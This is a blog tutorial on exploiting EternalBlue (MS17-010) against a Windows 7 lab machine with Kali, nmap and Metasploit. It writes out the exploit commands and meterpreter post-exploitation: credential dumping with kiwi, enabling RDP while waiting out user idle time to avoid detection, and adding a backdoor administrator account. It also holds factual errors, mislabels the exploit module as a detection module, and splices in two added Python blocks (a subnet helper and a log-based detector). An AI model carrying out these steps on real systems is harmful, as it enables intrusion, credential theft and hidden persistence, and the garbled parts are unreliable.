明国三年一场雨

Loves sharing technical knowledge

Kali - MSF EternalBlue Detailed Explanation (Reproduction, Demonstration, Remote, Backdoor, Packing, Fixing)

  1. Overview of Eternal Blue
    Eternal Blue, which erupted on the evening of April 14, 2017, is a vulnerability that exploits the SMB protocol in Windows to gain the highest system privileges and take control of the compromised computer. On May 12, 2017, malicious actors used "Eternal Blue" to build the WannaCry program, which hit a wide range of institutions worldwide, including schools, large enterprises, and governments; the only way to recover the encrypted files was to pay a high ransom. However, Microsoft patched the vulnerability (MS17-010) shortly after its release.

  2. SMB Protocol
    SMB (Server Message Block) is a client/server, request/response protocol for sharing files, printers, named pipes, and other resources between computers; the Windows "Network Neighborhood" relies on it. SMB works at the application and session layers and can run on top of TCP/IP. SMB uses TCP port 139 and TCP port 445.

  3. Preparation
    Virtual Machine: VMware
    Target Machine: Windows 7 (IP: 192.168.184.138) Image Download https://msdn.itellyou.cn/
    Attacker Machine: Kali (IP: 192.168.184.130)
    Tools: nmap and Metasploit (MSF) in Kali

  4. Vulnerability Reproduction

    1. Host Discovery
      a. Prerequisite: Disable the firewall on Win7.

      If the firewall stays enabled, nmap may not detect the open ports and MSF may fail to exploit the Eternal Blue vulnerability.


      You can use ipconfig or ifconfig to check the IP addresses of Win7 and Kali separately:


    2. Host Discovery using nmap in Kali


      Class A: 10.0.0.0~10.255.255.255
      Class B: 172.16.0.0~172.31.255.255
      Class C: 192.168.0.0~192.168.255.255
      /24 means the first 24 bits of the mask are ones, i.e. the subnet mask is 255.255.255.0.
      192.168.184.0/24: the number after "/" is the prefix length; it sets the subnet mask of the preceding address and therefore how many trailing (host) bits can vary.

      nmap -sP 192.168.184.0/24   # -sP: ping scan, host discovery only (newer nmap versions call this -sn)
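To make the /24 notation concrete, here is an added example (not part of the original post) that turns a prefix length into the subnet mask, counts the host bits that can vary, lists the host range a scan target such as 192.168.184.0/24 covers, and checks it against the three private ranges in the table above. It uses only the Python standard library.

```python
"""Work through CIDR notation as explained in the post: prefix length ->
subnet mask, host bits that can vary, covered host range, and whether
the block lies inside one of the private ranges listed (RFC 1918)."""
import ipaddress

# The three private blocks from the table above, as CIDR networks.
PRIVATE_RANGES = {
    "Class A": ipaddress.ip_network("10.0.0.0/8"),
    "Class B": ipaddress.ip_network("172.16.0.0/12"),
    "Class C": ipaddress.ip_network("192.168.0.0/16"),
}


def prefix_to_mask(prefix: int) -> str:
    """/24 -> '255.255.255.0': the top `prefix` bits of a 32-bit word set to 1."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix length must be 0..32")
    mask_int = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    return str(ipaddress.IPv4Address(mask_int))


def describe_cidr(cidr: str) -> dict:
    """Summarise what a scan target like 192.168.184.0/24 actually covers."""
    net = ipaddress.ip_network(cidr, strict=False)
    host_bits = 32 - net.prefixlen            # bits that may vary after the "/"
    hosts = list(net.hosts())                 # excludes network and broadcast addresses
    private = next((name for name, rng in PRIVATE_RANGES.items()
                    if net.subnet_of(rng)), None)
    return {
        "network": str(net.network_address),
        "mask": prefix_to_mask(net.prefixlen),
        "host_bits": host_bits,
        "addresses": net.num_addresses,
        "first_host": str(hosts[0]) if hosts else None,
        "last_host": str(hosts[-1]) if hosts else None,
        "private_range": private,
    }


if __name__ == "__main__":
    for key, value in describe_cidr("192.168.184.0/24").items():
        print(f"{key:14} {value}")
```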
      
    3. Host Discovery using Metasploit (MSF) in Kali

      msfconsole                                 // Start MSF
      use auxiliary/scanner/discovery/arp_sweep  // Use the module
      set rhosts 192.168.184.0/24   // Set the scan range
      set threads 50             // Increase the number of threads
      run                        // Run
      

      Search MSF for the Eternal Blue modules by entering search ms17-010 (MS17-010 is Microsoft's bulletin number for Eternal Blue):


      1. blue is the Eternal Blue vulnerability.
      2. psexec is a usable module in JavaScript (JS).
      3. command runs cmd.
      4. The last one is a detection module.

      a. First, let's use the detection module to see if our Win7 machine may have the vulnerability.

      use exploit/windows/smb/ms17_010_eternalblue
      show options 
      set rhosts 192.168.184.138
      exploit   # or: run
      


      If successful, the meterpreter > prompt appears.
      Meterpreter is a Metasploit extension for deeper post-exploitation of the target system, such as opening a cmd shell, capturing the screen, uploading/downloading files, and creating persistent backdoors.

      meterpreter > shell
      chcp 65001  # Switch the console code page to UTF-8 to avoid garbled output
      ipconfig  # Check IP
      whoami    # Check current username
      
    4. Capture the screen

      meterpreter > screenshot   # Take a screenshot
      


    5. Upload files

      meterpreter > upload user.txt c://
      


    6. Remote login
      Use the kiwi module to view passwords. Using it requires system administrator privileges:

      meterpreter > load kiwi // Load the kiwi module
      Loading extension kiwi...Success.
      creds_all  # List all credentials
      exit   # Exit
      


      Enable port 3389 (Remote Desktop) on the target machine from MSF

      By default, Windows Remote Desktop is not allowed:


      We won't manually allow remote connections on Win7; otherwise, how could we call ourselves hackers, hahaha...

      Open port 3389 on Win7, the Remote Desktop Protocol (RDP) port, by running the following from the meterpreter session:

      meterpreter > run post/windows/manage/enable_rdp  // Enable port 3389 for remote desktop on the target host
      meterpreter > idletime  // Check the idle time of remote users and wait for a long idle time before remote login to reduce the risk of being discovered.
      


      root@kali:~# rdesktop 192.168.184.138  // Use the rdesktop command to remotely connect to the desktop
      

      Because logging in this way uses the existing Win7 account, whoever is at the Win7 console will be logged out. So we create a new user to log in with:

      meterpreter > shell            # Enter the command line
      net user kill 123 /add         # Create a new user "kill" with password "123"
      net localgroup administrators kill /add # Add the user "kill" to the local administrators group of Win7 to obtain administrator privileges
      net user               # Check users
      
      root@kali:~# rdesktop 192.168.184.138  // Use the rdesktop command to remotely connect to the desktop
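From the defender's side, the steps just shown leave a recognisable trail in the Windows Security log: an account is created, added to the local Administrators group moments later, and then used for an RDP logon. The following added example (not code from the original post) correlates those three events; event IDs 4720, 4732 and 4624 with logon type 10 are the standard Windows audit values, while the record layout, field names and sample events are constructed for this example rather than taken from a real log export.

```python
"""Correlate Windows Security events for the local-admin backdoor pattern:
4720 (account created) -> 4732 (added to Administrators) -> 4624 logon
type 10 (RemoteInteractive, i.e. RDP) by that new account."""
from datetime import datetime, timedelta

# Constructed sample events (field names are this example's own, not a real export).
SAMPLE_EVENTS = [
    {"time": "2017-05-12T10:00:05", "id": 4720, "target": "kill", "subject": "SYSTEM"},
    {"time": "2017-05-12T10:00:07", "id": 4732, "target": "kill", "group": "Administrators", "subject": "SYSTEM"},
    {"time": "2017-05-12T10:03:40", "id": 4624, "target": "kill", "logon_type": 10, "src_ip": "192.168.184.130"},
    {"time": "2017-05-12T09:00:00", "id": 4720, "target": "svc_backup", "subject": "itadmin"},
    {"time": "2017-05-13T09:00:00", "id": 4624, "target": "svc_backup", "logon_type": 2},
]


def find_admin_backdoors(events, window=timedelta(hours=1)):
    """Return one dict per account that was created and granted local-admin rights
    within `window`, with the first RDP logon by that account (if any) attached."""
    by_acct = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        rec = by_acct.setdefault(ev["target"].lower(), {"created": None, "admin": None, "rdp": None})
        if ev["id"] == 4720:
            rec["created"] = t
        elif ev["id"] == 4732 and ev.get("group", "").lower() == "administrators":
            rec["admin"] = t
        # Only RDP logons that follow the account's creation event are of interest.
        elif ev["id"] == 4624 and ev.get("logon_type") == 10 and rec["created"] and rec["rdp"] is None:
            rec["rdp"] = (t, ev.get("src_ip"))
    hits = []
    for acct, rec in by_acct.items():
        if rec["created"] is None or rec["admin"] is None:
            continue
        delta = (rec["admin"] - rec["created"]).total_seconds()
        if 0 <= delta <= window.total_seconds():
            hits.append({
                "account": acct,
                "created": rec["created"].isoformat(),
                "admin_at": rec["admin"].isoformat(),
                "rdp_logon": rec["rdp"][0].isoformat() if rec["rdp"] else None,
                "rdp_from": rec["rdp"][1] if rec["rdp"] else None,
            })
    return hits


if __name__ == "__main__":
    for hit in find_admin_backdoors(SAMPLE_EVENTS):
        print(hit)
```

The same correlation can be pointed at a real export once the field names are mapped to the Security log's own (for 4732 the added member and the group live in separate fields).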
      